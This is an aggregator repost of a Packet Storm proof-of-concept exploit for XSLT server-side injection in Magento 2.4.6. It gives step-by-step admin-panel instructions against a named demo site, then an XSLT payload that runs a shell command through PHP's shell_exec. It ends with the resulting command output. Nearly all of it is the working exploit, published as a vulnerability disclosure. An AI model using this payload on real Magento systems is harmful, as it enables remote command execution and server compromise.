Security
Headlines
HeadlinesLatestCVEs

Headline

Magento 2.4.6 XSLT Server Side Injection

Magento version 2.4.6 XSLT server-side injection proof of concept exploit.

Packet Storm
#git#php#auth
# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side InjectionDate:** 2023-11-17Exploit Author:** tmrswrrVendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)Version:** 2.4.6Tested on:** 2.4.6## POC1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`3. Choose Import Source is File4. Click `XSLT Configuration` and write this payload:   ```xml   <?xml version="1.0" encoding="utf-8"?>   <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"   xmlns:php="http://php.net/xsl">     <xsl:template match="/">       <xsl:value-of select="php:function('shell_exec','id')" />     </xsl:template>   </xsl:stylesheet>```##RESULT  **<?xml version="1.0"?>**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6